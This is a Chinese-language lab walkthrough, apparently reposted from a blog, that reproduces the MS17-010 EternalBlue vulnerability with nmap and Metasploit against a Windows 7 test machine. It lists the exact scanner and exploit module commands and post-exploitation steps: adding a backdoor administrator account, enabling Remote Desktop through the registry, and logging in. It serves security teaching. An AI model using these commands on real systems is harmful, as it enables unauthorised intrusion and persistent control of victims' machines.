文章目錄

• • • 一、漏洞簡介
    • • 1、永恒之藍介紹:
      • 2、漏洞原理：
      • 3、影響版本：
    • 二、漏洞復現
    • • 復現環境：
      • 復現過程：
      • • 1、主機發現：
        • 2、使用MSF的永恒之藍漏洞模塊
        • 3、使用ms17-010掃描模塊，對靶機進行掃描：
        • 4、使用ms17-010攻擊模塊，對靶機進行攻擊
        • 5、得到靶機shell
        • 6、通過shell對靶機進行控制

一、漏洞簡介

1、永恒之藍介紹:

永恒之藍漏洞（MS17-010），它的爆發源于 WannaCry 勒索病毒的誕生，該病毒是不法分子利用NSA（National Security Agency，美國國家安全局）泄露的漏洞 “EternalBlue”（永恒之藍）進行改造而成 。勒索病毒的肆虐，儼然是一場全球性互聯網災難，給廣大電腦用戶造成了巨大損失。據統計，全球100多個國家和地區超過10萬臺電腦遭到了勒索病毒攻擊、感染。

2、漏洞原理：

永恒之藍漏洞通過 TCP 的445和139端口，來利用 SMBv1 和 NBT 中的遠程代碼執行漏洞，通過惡意代碼掃描并攻擊開放445文件共享端口的 Windows 主機。只要用戶主機開機聯網，即可通過該漏洞控制用戶的主機。不法分子就能在其電腦或服務器中植入勒索病毒、竊取用戶隱私、遠程控制木馬等惡意程序。

3、影響版本：

目前已知受影響的 Windows 版本包括但不限于：WindowsNT，Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8，Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。

二、漏洞復現

復現環境：

• 攻擊機：Linux kali（IP：192.168.50.130）

• 靶機：Windows 7 Enterprise with Service Pack 1 (x64)（IP：192.168.50.132）

實驗條件：兩臺機子可以相互ping通，并且靶機（無補丁）開啟了445端口，防火墻是關閉的！

復現過程：

1、主機發現：

登錄 kali linux，用 nmap 探測本網段存活主機

nmap 192.168.50.0/24

可以看到，靶機的445端口是開放的，而永恒之藍利用的就是445端口的SMB服務，操作系統溢出漏洞。

2、使用MSF的永恒之藍漏洞模塊

打開MSF：msfconsole

MSF每次打開都會有一個隨機的界面，花里胡哨的，不過我喜歡 ~(￣▽￣)~

搜索 ms17-010 代碼：search ms17_010

這里可以得到一些工具，其中 auxiliary/scanner/smb/smb_ms17_010 是永恒之藍掃描模塊， exploit/windows/smb/ms17_010_eternalblue 是永恒之藍攻擊模塊。一般配合使用，前者先掃描，若顯示有漏洞，再進行攻擊。

3、使用ms17-010掃描模塊，對靶機進行掃描：

使用模塊：

use auxiliary/scanner/smb/smb_ms17_010

設置目標IP或網段：

set rhosts 192.168.50.132

執行掃描：run

如果出現以上情況，就說明存在漏洞。

4、使用ms17-010攻擊模塊，對靶機進行攻擊

使用模塊：

use exploit/windows/smb/ms17_010_eternalblue

設置攻擊目標IP

set rhosts 192.168.50.132

可以使用 show options 命令查看設置選項

執行攻擊：exploit 或 run

攻擊完成！

5、得到靶機shell

輸入：chcp 65001 可解決亂碼問題。

解決了，但是沒有完全解決。

6、通過shell對靶機進行控制

1、創建新用戶 ，語法：net user 用戶名 密碼 /add

輸入：

net user sss 123456 /add

查看用戶信息，命令：net user

可以看到添加成功了。

2、將用戶sss添加至管理員組

net localgroup administrators sss /add

3、開啟遠程桌面功能

查看3389端口狀態：netstat -ano

看到3389端口并沒有開啟，開啟3389端口，命令：

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

3389端口開啟。

4、遠程桌面連接靶機

rdesktop 192.168.50.132:3389

使用創建的sss用戶進行登錄

登陸成功！

上面這是一個簡單的演示，告訴大家這個漏洞很危險，真正的攻擊能做的事情更多。

總結

以上是生活随笔為你收集整理的MS17-010（永恒之蓝）漏洞分析与复现的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。